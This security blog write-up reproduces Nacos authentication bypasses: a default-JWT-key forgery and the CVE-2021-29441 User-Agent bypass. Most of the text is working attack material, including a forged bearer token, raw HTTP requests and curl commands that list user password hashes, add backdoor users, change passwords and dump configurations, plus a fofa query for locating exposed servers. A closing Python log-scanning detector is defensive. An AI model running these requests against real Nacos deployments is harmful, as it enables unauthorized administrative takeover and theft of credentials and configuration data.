
Nacos vulnerability summary and reproduction

1. Nacos default JWT key allows authentication bypass

0x00 Vulnerability Description

A problem was found in Nacos (reported against Nacos <= 2.1.0): deployments that keep the default JWT signing key are exposed to an unauthorized-access vulnerability. Because the key is public, an attacker can sign their own JWT, bypass username/password authentication and log in to Nacos directly as a Nacos user.

0x01 Vulnerability Impact

0.1.0 <= Nacos <= 2.2.0

0x02 Vulnerability Search

fofa: app="NACOS"

0x03 Vulnerability Recurrence

In Nacos the token.secret.key value is hard-coded to a fixed default. It lives in application.properties under conf:


nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

1. Obtain a token: use the default key to construct a JWT and go straight into the console. Construction method:

On https://jwt.io/, enter the default key as the secret (tick "secret base64 encoded": Nacos Base64-decodes the configured secret before using it as the HMAC key):

SecretKey012345678901234567890123456789012345678901234567890123456789

Then enter the payload:

{
  "sub": "nacos",
  "exp": 1678899909
}

Note: 1678899909 is a Unix timestamp, and it must be later than the current time on your system. For example, with the current time being 2023-03-15 22:11:09, the timestamp used here falls on March 16:


Note: the following combinations were tested when forging JWT values to bypass authentication:

1. Extended timestamp; POSTed a wrong password with the correct username
2. Extended timestamp; POSTed a wrong password and a wrong username
3. Timestamp claim removed; wrong password and wrong username

Copy the token obtained above, intercept the login request in Burp and add it as a Bearer token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s


You need to add the Authorization header yourself in the request:

POST /nacos/v1/auth/users/login HTTP/1.1
Host: 10.211.55.5:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.211.55.5:8848
Connection: close
Referer: http://10.211.55.5:8848/nacos/index.html
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

username=crowsec&password=crowsec

At this point I got the token information back:

HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Content-Type: application/json
Date: Wed, 15 Mar 2023 14:13:22 GMT
Connection: close
Content-Length: 197

{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

At this point I have obtained a valid Nacos access token.

2. How do you log in to the console with this token? Log in with a fake account, then modify the response and release it. Let's try:

Log in with a fake account first and intercept the request in Burp.

This login will of course be rejected, so intercept the response here: right-click the request and choose to intercept the response to this request.

Then Forward. The response that comes back is of course the invalid-login one.

Replace it with the response obtained in Burp above (copy all of it), then Forward again.

Now I'm in.

3. Use the default key to generate a JWT and list the current users and password hashes:

GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s&pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Upgrade-Insecure-Requests: 1
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

4. Use the default key to add the user hellonacos with password hellonacos; it is created successfully:

POST /nacos/v1/auth/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

username=hellonacos&password=hellonacos

Check the result by listing the users again:

http://10.10.84.207:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=
http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

2. Nacos default configuration unauthorized access vulnerability

Mitigation: configure a serverIdentity (the nacos.core.auth.server.identity.key and nacos.core.auth.server.identity.value properties).

3. Nacos 2.2.0 permission bypass

Add the serverIdentity header to the request. If it is absent or does not match the configured value, the server returns 403.

4. Nacos 1.x.x User-Agent permission bypass (CVE-2021-29441)

0x01 Vulnerability Description

In Nacos 1.4.1 and earlier, the AuthFilter servlet filter enforces authentication, but it contains a backdoor that lets Nacos servers bypass the filter and therefore skip the authentication checks. This mechanism relies on the User-Agent HTTP header, so it is trivially spoofed. The issue allows any user to perform any administrative task on the Nacos server.

0x02 Environment construction

docker run -d -p 8848:8848 hglight/cve-2021-29441

0x03 Vulnerability Impact

Nacos <= 1.4.1

0x04 Vulnerability Recurrence

1. Set the User-Agent of the request to Nacos-Server. With that header added, request http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9 : the response is 200 and the body contains pageItems.

GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

Or do it from the command line. Read the user list (usernames and password hashes):

curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken=' -H 'User-Agent: Nacos-Server'
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur' -H 'User-Agent: Nacos-Server'
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate' -H 'User-Agent: Nacos-Server'

Add a user without authorization:

curl -X POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1&password=test1' -H 'User-Agent: Nacos-Server'

Change any user's password:

curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent: Nacos-Server' -d 'username=test1&newPassword=test2'

Read configuration files:

curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99'
curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blur&dataId=&group=&pageNo=1&pageSize=99'

2. With the header added, send a POST to http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub to add a new user whose account and password are both vulhub:

POST /nacos/v1/auth/users?username=hglight&password=hglight HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

or

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.64:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=hglight&password=hglight

List the users again: the returned user list now contains the new user we created by bypassing authentication.

GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

Open http://IP:8848/nacos and log in with the new user; a successful login means the vulnerability was exploited successfully.
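Detection for the two bypasses in this post, as an added Python example (not code from the post or from Nacos): it runs three rules over access-log lines from a reverse proxy in front of Nacos and flags the Nacos-Server User-Agent arriving from outside the cluster network (CVE-2021-29441), successful writes to the user-management API such as the user creation above, and the bulk configuration listing with empty dataId/group from the curl commands. Assumptions: the log lines are constructed for the example in nginx "combined" format, the cluster network 10.0.0.0/24 is a placeholder for wherever your real Nacos nodes live, and the rule names and the analyze() function are mine.

```python
"""Scan reverse-proxy access logs in front of Nacos for the bypass patterns above."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate Nacos cluster members, the only callers that should ever send the
# "Nacos-Server" User-Agent, live in this network. Adjust to your deployment.
CLUSTER_NET = ipaddress.ip_network("10.0.0.0/24")

RULE_UA = "CVE-2021-29441: Nacos-Server User-Agent from outside the cluster network"
RULE_USER_MGMT = "user account created/changed/deleted via /nacos/v1/auth/users"
RULE_CONFIG_DUMP = "bulk configuration listing (search with empty dataId/group)"

# nginx "combined" log format (assumed for the proxy in front of Nacos).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not real traffic: a legitimate cluster call, the User-Agent
# bypass listing and then creating a user, a normal console login, a config dump with
# curl, and a normal client config read.
SAMPLE_LOG = """\
10.0.0.11 - - [15/Mar/2023:14:13:22 +0000] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 512 "-" "Nacos-Server"
203.0.113.7 - - [15/Mar/2023:14:15:01 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 197 "-" "Nacos-Server"
203.0.113.7 - - [15/Mar/2023:14:15:09 +0000] "POST /nacos/v1/auth/users?username=test1&password=test1 HTTP/1.1" 200 24 "-" "Nacos-Server"
198.51.100.4 - - [15/Mar/2023:14:20:40 +0000] "POST /nacos/v1/auth/users/login HTTP/1.1" 200 197 "http://10.211.55.5:8848/nacos/index.html" "Mozilla/5.0"
198.51.100.4 - - [15/Mar/2023:14:21:03 +0000] "GET /nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99 HTTP/1.1" 200 4096 "-" "curl/7.88.1"
10.0.0.12 - - [15/Mar/2023:14:22:00 +0000] "GET /nacos/v1/cs/configs?dataId=app.yaml&group=DEFAULT_GROUP HTTP/1.1" 200 88 "-" "Nacos-Java-Client:v1.4.1"
"""


def analyze(log_text: str, cluster_net=CLUSTER_NET):
    """Return (client ip, rule, request target) for every suspicious line, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format: skip rather than crash on it
        ip = ipaddress.ip_address(m["ip"])
        method, target, status, ua = m["method"], m["target"], int(m["status"]), m["ua"]
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)  # keep "dataId=" as an empty value

        # 1. The backdoor User-Agent is only legitimate between cluster nodes.
        if ua.startswith("Nacos-Server") and ip not in cluster_net:
            alerts.append((m["ip"], RULE_UA, target))

        # 2. A successful write to the user-management API (login is excluded).
        if (url.path.startswith("/nacos/v1/auth/users")
                and not url.path.startswith("/nacos/v1/auth/users/login")
                and method in ("POST", "PUT", "DELETE") and status == 200):
            alerts.append((m["ip"], RULE_USER_MGMT, target))

        # 3. Config enumeration: a search with an empty dataId, as in the curl commands.
        if (url.path == "/nacos/v1/cs/configs" and "search" in query
                and query.get("dataId", [""])[0] == "" and status == 200):
            alerts.append((m["ip"], RULE_CONFIG_DUMP, target))
    return alerts


if __name__ == "__main__":
    for ip, rule, target in analyze(SAMPLE_LOG):
        print(f"{ip}  {rule}  {target}")
```

Rule 1 is the only one that is a clean indicator on its own; rules 2 and 3 also fire on legitimate administration, so correlate them with the source address and with whether the request carried a token the console would have sent.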
